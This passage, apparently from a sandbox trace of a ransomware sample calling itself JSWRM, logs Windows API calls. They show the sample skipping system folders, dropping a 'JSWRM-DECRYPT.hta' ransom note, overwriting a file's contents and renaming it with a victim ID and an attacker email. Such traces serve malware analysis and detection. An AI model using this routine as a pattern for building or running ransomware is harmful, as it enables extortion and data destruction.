(lpString1="SetupResources.dll", lpString2=".") returned 1 [0059.159] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0059.159] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0059.159] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0059.159] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0059.159] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0059.159] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0059.159] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0059.159] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0059.159] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0059.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0059.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241038, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0059.159] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241358, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.159] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0059.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0059.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0059.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0059.159] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.159] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0059.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0059.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.160] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1037", cAlternateFileName="")) returned 1 [0059.160] lstrcmpiW (lpString1="1037", lpString2=".") returned 1 [0059.160] lstrcmpiW (lpString1="1037", lpString2="..") returned 1 [0059.160] lstrcmpiW (lpString1="1037", lpString2="...") returned 1 [0059.160] lstrcmpiW (lpString1="1037", lpString2="windows") returned -1 [0059.160] lstrcmpiW (lpString1="1037", lpString2="recovery") returned -1 [0059.160] lstrcmpiW (lpString1="1037", lpString2="perflogs") returned -1 [0059.160] lstrcmpiW (lpString1="1037", lpString2="documents and settings") returned -1 [0059.160] lstrcmpiW (lpString1="1037", lpString2="$RECYCLE.BIN") returned 1 [0059.160] lstrcmpiW (lpString1="1037", lpString2="system volume information") returned -1 [0059.160] lstrcmpiW (lpString1="1037", lpString2="msocache") returned -1 [0059.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0059.160] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225d30 [0059.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0059.160] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1037\\jswrm-decrypt.hta")) returned 0xffffffff [0059.160] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225d30 | out: hHeap=0x1e0000) returned 1 [0059.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.160] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0059.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0059.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0059.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0059.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0059.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0059.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225cb0 [0059.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0059.161] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1037\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0059.235] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.235] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0059.236] CloseHandle (hObject=0x450) returned 1 [0059.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225cb0 | out: hHeap=0x1e0000) returned 1 [0059.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0059.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0059.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0059.237] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1037\\jswrm-decrypt.hta")) returned 0x20 [0059.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0059.237] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.237] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.237] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19f8e359, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0059.237] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.238] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19f8e359, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0059.238] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.238] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.238] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.238] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0059.238] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0059.238] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0059.238] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0059.238] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0059.238] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0059.238] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0059.238] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0059.238] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0059.238] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0059.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0059.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0059.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0059.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0059.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0059.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.238] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0059.239] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.239] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=6851) returned 1 [0059.239] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ac0) returned 0x23dc88 [0059.239] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0x1ac0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0x1ac0, lpOverlapped=0x0) returned 1 [0059.241] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.241] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0x1ac0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0x1ac0, lpOverlapped=0x0) returned 1 [0059.241] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0059.241] CloseHandle (hObject=0x3d4) returned 1 [0059.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0059.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0059.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0059.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0059.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0059.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0059.242] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0059.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0059.242] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.242] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0059.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0059.243] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0059.243] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19f68421, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x19f68421, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x19f8e359, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0059.243] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0059.243] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0059.243] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0059.243] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0059.243] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0059.243] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0059.243] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0059.243] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0059.243] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0059.243] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0059.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.243] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.243] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0059.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0059.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0059.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0059.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0059.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0059.244] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.244] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0059.244] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0059.244] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0059.244] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0059.244] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0059.244] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0059.244] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0059.244] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0059.244] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0059.244] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0059.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0059.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0059.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.244] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0059.244] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0059.245] WideCharToMultiByte (in: CodePage=0xfde9, 